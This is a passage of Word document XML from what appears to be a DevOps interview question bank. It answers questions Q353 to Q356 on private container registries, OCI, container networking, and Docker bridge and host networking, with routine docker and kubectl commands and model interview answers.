        <w:t xml:space="preserve">               * JFrog Artifactory</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * GitHub Container Registry (GHCR)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Authentication</w:t>
        <w:br/>
        <w:t>Before pushing or pulling images:</w:t>
        <w:br/>
        <w:t>docker login registry.company.com</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>docker login myregistry.azurecr.io</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Push Image to Private Registry</w:t>
        <w:br/>
        <w:t>Tag image:</w:t>
        <w:br/>
        <w:t>docker tag myapp:v1 registry.company.com/myapp:v1</w:t>
        <w:br/>
        <w:t>Push image:</w:t>
        <w:br/>
        <w:t>docker push registry.company.com/myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Pull Image</w:t>
        <w:br/>
        <w:t>docker pull registry.company.com/myapp:v1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Kubernetes Integration</w:t>
        <w:br/>
        <w:t>To pull images from a private registry, Kubernetes uses an image pull secret.</w:t>
        <w:br/>
        <w:t>Create secret:</w:t>
        <w:br/>
        <w:t>kubectl create secret docker-registry regcred \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --docker-server=registry.company.com \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --docker-username=user \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --docker-password=password</w:t>
        <w:br/>
        <w:t>Use in Pod:</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  imagePullSecrets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: regcred</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Security Features</w:t>
        <w:br/>
        <w:t>Private registries typically provide:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Authentication (IAM, LDAP, SSO)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Role-Based Access Control (RBAC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Vulnerability Scanning</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image Signing</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Audit Logs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Image Replication</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Encryption at Rest and In Transit</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Public vs Private Registry</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Public Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Private Registry</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Access</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Open to everyone</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Restricted</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Security</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Lower</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Higher</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Proprietary Images</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Not recommended</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Compliance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Enterprise-grade</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Authentication</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Optional</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Required</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World DevOps Flow</w:t>
        <w:br/>
        <w:t>Developer</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Git Push</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>CI/CD Pipeline</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Docker Build</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Push Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Private Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Kubernetes Pulls Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ▼</w:t>
        <w:br/>
        <w:t>Production Deployment</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A private container registry is a secure repository used to store and manage container images that are accessible only to authenticated users and systems. Organizations use private registries to protect proprietary applications, enforce access controls, and meet compliance requirements. Common examples include Amazon ECR, Azure Container Registry, Google Artifact Registry, and Harbor. In Kubernetes environments, image pull secrets are commonly used to authenticate against private registries. Private registries often provide advanced features such as RBAC, vulnerability scanning, image signing, audit logging, and geo-replication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q353. What is OCI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is OCI?</w:t>
        <w:br/>
        <w:t>OCI (Open Container Initiative) is an open industry standard that defines specifications for container images and container runtimes, ensuring containers work consistently across different platforms and tools.</w:t>
        <w:br/>
        <w:t>OCI was established in 2015 by the Linux Foundation with contributions from companies such as Docker, Google, Microsoft, and others.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why OCI Was Created</w:t>
        <w:br/>
        <w:t>Before OCI:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Different container platforms could implement incompatible formats.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Portability between tools was not guaranteed.</w:t>
        <w:br/>
        <w:t>OCI standardized:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               1. Container Image Format</w:t>
        <w:br/>
        <w:t xml:space="preserve">               2. Container Runtime Specification</w:t>
        <w:br/>
        <w:t>This allows images and containers to run across different OCI-compliant tools.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>OCI Specifications</w:t>
        <w:br/>
        <w:t>1. OCI Image Specification</w:t>
        <w:br/>
        <w:t>Defines how container images are structured.</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>Docker Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>OCI Image Format</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Registry</w:t>
        <w:br/>
        <w:t>An image built by Docker can be used by other OCI-compliant runtimes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. OCI Runtime Specification</w:t>
        <w:br/>
        <w:t>Defines how a container should be executed.</w:t>
        <w:br/>
        <w:t>Example OCI runtimes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * crun</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * gVisor</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Kata Containers</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>OCI Ecosystem</w:t>
        <w:br/>
        <w:t>Container Image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>OCI Image Spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container Registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>runc (OCI Runtime)</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker and OCI</w:t>
        <w:br/>
        <w:t>Modern Docker is OCI-compliant.</w:t>
        <w:br/>
        <w:t>When you run:</w:t>
        <w:br/>
        <w:t>docker run nginx</w:t>
        <w:br/>
        <w:t>Internally:</w:t>
        <w:br/>
        <w:t>Docker CLI</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Docker Engine</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>runc</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t>runc follows the OCI Runtime Specification.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>OCI in Kubernetes</w:t>
        <w:br/>
        <w:t>Kubernetes relies on OCI-compliant container runtimes such as:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * containerd</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * CRI-O</w:t>
        <w:br/>
        <w:t>This allows Kubernetes to run containers without depending directly on Docker.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits of OCI</w:t>
        <w:br/>
        <w:t>✅ Vendor-neutral standard</w:t>
        <w:br/>
        <w:t>✅ Portability across platforms</w:t>
        <w:br/>
        <w:t>✅ Interoperability between tools</w:t>
        <w:br/>
        <w:t>✅ Encourages ecosystem innovation</w:t>
        <w:br/>
        <w:t>✅ Prevents vendor lock-in</w:t>
        <w:br/>
        <w:t>✅ Standardized image and runtime formats</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>OCI, or Open Container Initiative, is an open standard under the Linux Foundation that defines specifications for container images and container runtimes. The OCI Image Specification standardizes how container images are packaged and distributed, while the OCI Runtime Specification defines how containers are executed. Tools such as Docker, containerd, CRI-O, and runc are OCI-compliant, enabling interoperability across container ecosystems. OCI plays a critical role in Kubernetes and modern cloud-native platforms by ensuring portability and preventing vendor lock-in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q354. Explain container networking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Container Networking?</w:t>
        <w:br/>
        <w:t>Container networking is the mechanism that enables containers to communicate with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Other containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * The host machine</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * External networks and the internet</w:t>
        <w:br/>
        <w:t>Since containers are isolated by default, networking provides connectivity between them and other systems.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why is Container Networking Needed?</w:t>
        <w:br/>
        <w:t>Consider a web application:</w:t>
        <w:br/>
        <w:t>Frontend Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t>Backend Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t>Database Container</w:t>
        <w:br/>
        <w:t>For the application to work:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Frontend must reach Backend.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Backend must reach Database.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Users must reach Frontend.</w:t>
        <w:br/>
        <w:t>Container networking enables these communications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Networking Architecture</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▼</w:t>
        <w:br/>
        <w:t>Docker Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">     ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">     │</w:t>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t>Each container gets:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * An IP address</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network namespace</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routing table</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * DNS resolution</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Docker Network Types</w:t>
        <w:br/>
        <w:t>1. Bridge Network (Default)</w:t>
        <w:br/>
        <w:t>Most commonly used on a single host.</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:t>Default bridge:</w:t>
        <w:br/>
        <w:t>docker run -d nginx</w:t>
        <w:br/>
        <w:t>Architecture:</w:t>
        <w:br/>
        <w:t>Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Docker Bridge</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>Container B</w:t>
        <w:br/>
        <w:t>Containers on the same bridge can communicate.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Host Network</w:t>
        <w:br/>
        <w:t>Container shares the host’s network stack.</w:t>
        <w:br/>
        <w:t>docker run --network host nginx</w:t>
        <w:br/>
        <w:t>Advantages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Better performance</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * No NAT overhead</w:t>
        <w:br/>
        <w:t>Disadvantage:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Reduced isolation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. None Network</w:t>
        <w:br/>
        <w:t>No networking.</w:t>
        <w:br/>
        <w:t>docker run --network none nginx</w:t>
        <w:br/>
        <w:t>Container has only loopback interface.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Overlay Network</w:t>
        <w:br/>
        <w:t>Used for multi-host communication in Docker Swarm and Kubernetes.</w:t>
        <w:br/>
        <w:t>Node 1</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Container A</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve"> Overlay Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t>Node 2</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └─ Container B</w:t>
        <w:br/>
        <w:t>Allows containers on different hosts to communicate.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Container-to-Container Communication</w:t>
        <w:br/>
        <w:t>Create network:</w:t>
        <w:br/>
        <w:t>docker network create app-network</w:t>
        <w:br/>
        <w:t>Run containers:</w:t>
        <w:br/>
        <w:t>docker run -d --name db --network app-network mysql</w:t>
        <w:br/>
        <w:t>docker run -d --name app --network app-network myapp</w:t>
        <w:br/>
        <w:t>Application can connect using:</w:t>
        <w:br/>
        <w:t>db:3306</w:t>
        <w:br/>
        <w:t>Docker provides built-in DNS resolution.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Port Mapping</w:t>
        <w:br/>
        <w:t>Expose container service externally:</w:t>
        <w:br/>
        <w:t>docker run -p 8080:80 nginx</w:t>
        <w:br/>
        <w:t>Meaning:</w:t>
        <w:br/>
        <w:t>Host Port 8080</w:t>
        <w:br/>
        <w:t xml:space="preserve">       │</w:t>
        <w:br/>
        <w:t xml:space="preserve">       ▼</w:t>
        <w:br/>
        <w:t>Container Port 80</w:t>
        <w:br/>
        <w:t>Access:</w:t>
        <w:br/>
        <w:t>http://localhost:8080</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Networking in Kubernetes</w:t>
        <w:br/>
        <w:t>Kubernetes networking model requires:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Every Pod gets its own IP.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Pods can communicate without NAT.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Services provide stable access to Pods.</w:t>
        <w:br/>
        <w:t>Pod A</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▼</w:t>
        <w:br/>
        <w:t>Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>Pod B</w:t>
        <w:br/>
        <w:t>Common CNI plugins:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Calico</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Cilium</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Flannel</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Networking Components Behind the Scenes</w:t>
        <w:br/>
        <w:t>Linux features used by containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network Namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Virtual Ethernet (veth) pairs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Linux Bridges</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * iptables/nftables</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Routing tables</w:t>
        <w:br/>
        <w:t>Flow:</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>veth pair</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>Linux Bridge</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>Host Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">   │</w:t>
        <w:br/>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>Container networking enables communication between containers, hosts, and external systems while maintaining isolation. Docker provides networking modes such as bridge, host, none, and overlay. By default, containers are attached to a bridge network and can communicate using IP addresses or Docker’s built-in DNS. In Kubernetes, each pod receives its own IP address, and communication is managed through the CNI layer using solutions like Calico or Cilium. Under the hood, container networking relies on Linux network namespaces, veth pairs, bridges, and packet forwarding mechanisms to provide connectivity and isolation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q355. What are bridge networks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What are Bridge Networks?</w:t>
        <w:br/>
        <w:t>A Bridge Network is Docker’s default network driver that allows containers running on the same host to communicate with each other through a virtual bridge.</w:t>
        <w:br/>
        <w:t>When Docker is installed, it automatically creates a bridge network called bridge.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How It Works</w:t>
        <w:br/>
        <w:t>Container A (172.17.0.2)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve">   docker0 Bridge</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t>Container B (172.17.0.3)</w:t>
        <w:br/>
        <w:t xml:space="preserve">        │</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ▼</w:t>
        <w:br/>
        <w:t xml:space="preserve">     Host Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Each container gets its own IP address.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Docker creates a virtual Ethernet (veth) pair for each container.</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Traffic passes through the Linux bridge (docker0).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Default Bridge Network</w:t>
        <w:br/>
        <w:t>View networks:</w:t>
        <w:br/>
        <w:t>docker network ls</w:t>
        <w:br/>
        <w:t>Example output:</w:t>
        <w:br/>
        <w:t>NETWORK ID     NAME      DRIVER</w:t>
        <w:br/>
        <w:t>xxxxxxx        bridge    bridge</w:t>
        <w:br/>
        <w:t>xxxxxxx        host      host</w:t>
        <w:br/>
        <w:t>xxxxxxx        none      null</w:t>
        <w:br/>
        <w:t>Inspect the bridge network:</w:t>
        <w:br/>
        <w:t>docker network inspect bridge</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>User-Defined Bridge Network</w:t>
        <w:br/>
        <w:t>Create a custom bridge network:</w:t>
        <w:br/>
        <w:t>docker network create my-network</w:t>
        <w:br/>
        <w:t>Run containers:</w:t>
        <w:br/>
        <w:t>docker run -d --name app --network my-network nginx</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>docker run -d --name db --network my-network mysql</w:t>
        <w:br/>
        <w:t>Containers can communicate using container names:</w:t>
        <w:br/>
        <w:t>db:3306</w:t>
        <w:br/>
        <w:t>Docker provides automatic DNS resolution within user-defined bridge networks.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Bridge Network Features</w:t>
        <w:br/>
        <w:t>Container-to-Container Communication</w:t>
        <w:br/>
        <w:t>Web Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▼</w:t>
        <w:br/>
        <w:t>Bridge Network</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ▲</w:t>
        <w:br/>
        <w:t xml:space="preserve">      │</w:t>
        <w:br/>
        <w:t>DB Container</w:t>
        <w:br/>
        <w:t>Containers on the same bridge network can communicate directly.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>External Connectivity</w:t>
        <w:br/>
        <w:t>Containers can access the internet through NAT.</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker0</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Host</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Port Publishing</w:t>
        <w:br/>
        <w:t>Expose a container service externally:</w:t>
        <w:br/>
        <w:t>docker run -p 8080:80 nginx</w:t>
        <w:br/>
        <w:t>Host:8080  ---&gt;  Container:80</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Default vs User-Defined Bridge</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Default Bridge</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User-Defined Bridge</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Automatic DNS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Container Name Resolution</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Limited</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Supported</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Shared</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Better</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Recommended</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Best Practice: Use user-defined bridge networks instead of the default bridge network.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Behind the Scenes</w:t>
        <w:br/>
        <w:t>Docker bridge networking uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Linux Bridge (docker0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * Network Namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * veth pairs</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * iptables/NAT rules</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>veth pair</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>docker0 bridge</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Host NIC</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Internet</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview Answer (7+ Years Experience)</w:t>
        <w:br/>
        <w:t>A bridge network is Docker’s default networking mechanism for enabling communication between containers on the same host. It uses a Linux bridge, typically docker0, to connect container network namespaces through virtual Ethernet interfaces. Containers attached to the same bridge network can communicate using IP addresses, and user-defined bridge networks additionally provide built-in DNS-based service discovery. Bridge networks also use NAT to enable outbound internet access and support port publishing to expose container services externally. They are commonly used for single-host container deployments and local development environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q356. Explain host networking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is Host Networking?</w:t>
        <w:br/>
        <w:t>Host networking is a Docker network mode where a container shares the host machine’s network stack directly instead of getting its own network namespace and IP address.</w:t>
        <w:br/>
        <w:t>In this mode, the container uses:</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * The host’s IP address</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * The host’s network interfaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">               * The host’s ports</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture</w:t>
        <w:br/>
        <w:t>Bridge Network (Default)</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Docker Bridge</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Host Network</w:t>
        <w:br/>
        <w:t>Host Network</w:t>
        <w:br/>
        <w:t>Container</w:t>
        <w:br/>
        <w:t xml:space="preserve">    │</w:t>
        <w:br/>
        <w:t>Host Network Stack</w:t>
        <w:br/>
